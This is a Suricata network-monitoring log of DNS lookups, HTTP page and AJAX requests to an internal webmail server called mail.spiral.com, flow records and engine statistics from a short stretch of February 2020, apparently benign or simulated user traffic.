{"timestamp":"2020-02-29T00:15:44.873520+0000","flow_id":1508751902266416,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59127,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56447,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:44.982402+0000","flow_id":1508751902266416,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59127,"proto":"UDP","dns":{"type":"answer","id":56447,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:44.982402+0000","flow_id":1508751902266416,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59127,"proto":"UDP","dns":{"type":"answer","id":56447,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:45.143410+0000","flow_id":413251773933581,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34844,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/search.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6760}} 
{"timestamp":"2020-02-29T00:15:46.000610+0000","flow_id":1209336842897935,"event_type":"flow","src_ip":"192.168.10.130","src_port":34832,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1089,"bytes_toclient":7728,"start":"2020-02-29T00:14:39.936463+0000","end":"2020-02-29T00:14:45.180132+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:47.000223+0000","event_type":"stats","stats":{"uptime":14599,"capture":{"kernel_packets":135984,"kernel_drops":0},"decoder":{"pkts":135995,"bytes":93577219,"invalid":188,"ipv4":134484,"ipv6":8,"ethernet":135995,"raw":0,"null":0,"sll":0,"tcp":129117,"udp":5164,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2789,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2805,"synack":2796,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1828,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2361,"failed_udp":112},"tx":{"http":4692,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2441}},"flow_mgr":{"closed_pruned":2770,"new_pruned":15,"est_pruned":2404,"bypas
sed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23141,"memcap_state":0,"memcap_global":0},"http":{"memuse":98271,"memcap":0}}} {"timestamp":"2020-02-29T00:15:49.000673+0000","flow_id":1084958869762291,"event_type":"flow","src_ip":"192.168.10.122","src_port":49707,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:47.995571+0000","end":"2020-02-29T00:10:48.103585+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:50.000287+0000","flow_id":1715253910491618,"event_type":"flow","src_ip":"192.168.10.122","src_port":38186,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:48.905698+0000","end":"2020-02-29T00:10:49.013601+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:50.000649+0000","flow_id":1095949691237231,"event_type":"flow","src_ip":"192.168.10.122","src_port":46147,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:49.242543+0000","end":"2020-02-29T00:10:49.351235+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:15:50.000730+0000","flow_id":1940791233185635,"event_type":"flow","src_ip":"192.168.10.122","src_port":40899,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:49.100195+0000","end":"2020-02-29T00:10:49.208618+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:50.144599+0000","flow_id":413251773933581,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34844,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/search.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6760},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":33149,"tx_id":0}} {"timestamp":"2020-02-29T00:15:50.221676+0000","flow_id":1337670470361580,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47730,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":24645,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:50.330124+0000","flow_id":1337670470361580,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47730,"proto":"UDP","dns":{"type":"answer","id":24645,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:15:50.330124+0000","flow_id":1337670470361580,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47730,"proto":"UDP","dns":{"type":"answer","id":24645,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:50.404112+0000","flow_id":623112466345782,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34846,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7753}} {"timestamp":"2020-02-29T00:15:51.000352+0000","flow_id":1428599203355264,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"162.159.200.1","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:10:50.449152+0000","end":"2020-02-29T00:10:50.451079+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:52.000623+0000","flow_id":1918758066486106,"event_type":"flow","src_ip":"192.168.10.130","src_port":34834,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1079,"bytes_toclient":4820,"start":"2020-02-29T00:14:46.031578+0000","end":"2020-02-29T00:14:51.218164+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:15:52.475712+0000","flow_id":1877711068348992,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35574,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":42047,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:52.580812+0000","flow_id":1877711068348992,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35574,"proto":"UDP","dns":{"type":"answer","id":42047,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:52.580812+0000","flow_id":1877711068348992,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35574,"proto":"UDP","dns":{"type":"answer","id":42047,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:52.619485+0000","flow_id":198980151024429,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34848,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":99}} {"timestamp":"2020-02-29T00:15:52.619485+0000","flow_id":198980151024429,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34848,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu 
Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":99},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:15:54.000393+0000","event_type":"stats","stats":{"uptime":14606,"capture":{"kernel_packets":136002,"kernel_drops":0},"decoder":{"pkts":136021,"bytes":93587551,"invalid":188,"ipv4":134506,"ipv6":8,"ethernet":136021,"raw":0,"null":0,"sll":0,"tcp":129137,"udp":5166,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2790,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2806,"synack":2797,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1829,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2362,"failed_udp":112},"tx":{"http":4693,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2442}},"flow_mgr":{"closed_pruned":2771,"new_pruned":15,"est_pruned":2409,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":4,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65528,"rows_empty":3,"rows_busy":0,"rows_maxlen"
:1},"dns":{"memuse":22479,"memcap_state":0,"memcap_global":0},"http":{"memuse":92914,"memcap":0}}} {"timestamp":"2020-02-29T00:15:55.000509+0000","flow_id":30355435553035,"event_type":"flow","src_ip":"192.168.10.81","src_port":52758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":13,"bytes_toserver":2866,"bytes_toclient":7700,"start":"2020-02-29T00:14:44.196875+0000","end":"2020-02-29T00:14:54.542150+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:55.405021+0000","flow_id":623112466345782,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34846,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7753},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":26692,"tx_id":0}} {"timestamp":"2020-02-29T00:15:57.624359+0000","flow_id":198980151024429,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34848,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":99},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":96,"tx_id":0}} {"timestamp":"2020-02-29T00:16:01.000196+0000","event_type":"stats","stats":{"uptime":14613,"capture":{"kernel_packets":136038,"kernel_drops":0},"decoder":{"pkts":136039,"bytes":93589986,"invalid":188,"ipv4":134524,"ipv6":8,"ethernet":136039,"raw":0,"null":0,"sll":0,"tcp":129153,"udp":5168,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2791,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2807,"synack":2798,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1830,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2363,"failed_udp":112},"tx":{"http":4694,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2443}},"flow_mgr":{"closed_pruned":2773,"new_pruned":15,"est_pruned":2409,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22479,"memcap_state":0,"memcap_g
lobal":0},"http":{"memuse":24177,"memcap":0}}} {"timestamp":"2020-02-29T00:16:03.000121+0000","flow_id":1847126602345263,"event_type":"flow","src_ip":"192.168.10.130","src_port":34836,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":24,"pkts_toclient":25,"bytes_toserver":2616,"bytes_toclient":28174,"start":"2020-02-29T00:14:52.715567+0000","end":"2020-02-29T00:15:01.606362+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:03.979541+0000","flow_id":1602206096945749,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60926,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15141,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:04.086107+0000","flow_id":1602206096945749,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60926,"proto":"UDP","dns":{"type":"answer","id":15141,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:04.086107+0000","flow_id":1602206096945749,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60926,"proto":"UDP","dns":{"type":"answer","id":15141,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:04.218436+0000","flow_id":544162378397647,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8820}} {"timestamp":"2020-02-29T00:16:08.000247+0000","event_type":"stats","stats":{"uptime":14620,"capture":{"kernel_packets":136044,"kernel_drops":0},"decoder":{"pkts":136059,"bytes":93601097,"invalid":188,"ipv4":134544,"ipv6":8,"ethernet":136059,"raw":0,"null":0,"sll":0,"tcp":129171,"udp":5170,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2792,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2808,"synack":2799,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1831,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2364,"failed_udp":112},"tx":{"http":4695,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2444}},"flow_mgr":{"closed_pruned":2774,"new_pruned":15,"est_pruned":2409,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22809,"memcap_state":0,"memcap_global":0},"http":{"memuse":109686,"memcap":0}}} 
{"timestamp":"2020-02-29T00:16:09.219329+0000","flow_id":544162378397647,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52762,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8820},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":36778,"tx_id":0}} {"timestamp":"2020-02-29T00:16:10.000881+0000","flow_id":512302305152088,"event_type":"flow","src_ip":"192.168.10.130","src_port":34830,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":14,"bytes_toserver":2179,"bytes_toclient":9824,"start":"2020-02-29T00:14:34.691288+0000","end":"2020-02-29T00:15:09.176468+0000","age":35,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:13.650442+0000","flow_id":144498492304586,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58932,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":29509,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:13.758493+0000","flow_id":144498492304586,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58932,"proto":"UDP","dns":{"type":"answer","id":29509,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:16:13.758493+0000","flow_id":144498492304586,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58932,"proto":"UDP","dns":{"type":"answer","id":29509,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:13.789852+0000","flow_id":1230407958635898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34850,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50}} {"timestamp":"2020-02-29T00:16:13.789852+0000","flow_id":1230407958635898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34850,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":29,"tx_id":0}} 
{"timestamp":"2020-02-29T00:16:14.000386+0000","flow_id":480231771154811,"event_type":"flow","src_ip":"192.168.10.122","src_port":34716,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:13.403835+0000","end":"2020-02-29T00:11:13.512776+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:15.000325+0000","event_type":"stats","stats":{"uptime":14627,"capture":{"kernel_packets":136059,"kernel_drops":0},"decoder":{"pkts":136062,"bytes":93601295,"invalid":188,"ipv4":134547,"ipv6":8,"ethernet":136062,"raw":0,"null":0,"sll":0,"tcp":129174,"udp":5170,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2792,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2808,"synack":2799,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1831,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2364,"failed_udp":112},"tx":{"http":4695,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2444}},"flow_mgr":{"closed_pruned":2775,"new_pruned":15,"est_pruned":2409,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":
65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22810,"memcap_state":0,"memcap_global":0},"http":{"memuse":39762,"memcap":0}}} {"timestamp":"2020-02-29T00:16:15.001120+0000","flow_id":422730764433898,"event_type":"flow","src_ip":"192.168.10.130","src_port":34838,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1875,"bytes_toclient":5458,"start":"2020-02-29T00:15:08.702954+0000","end":"2020-02-29T00:15:14.111373+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:17.582541+0000","flow_id":826028198060941,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59430,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":3528,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 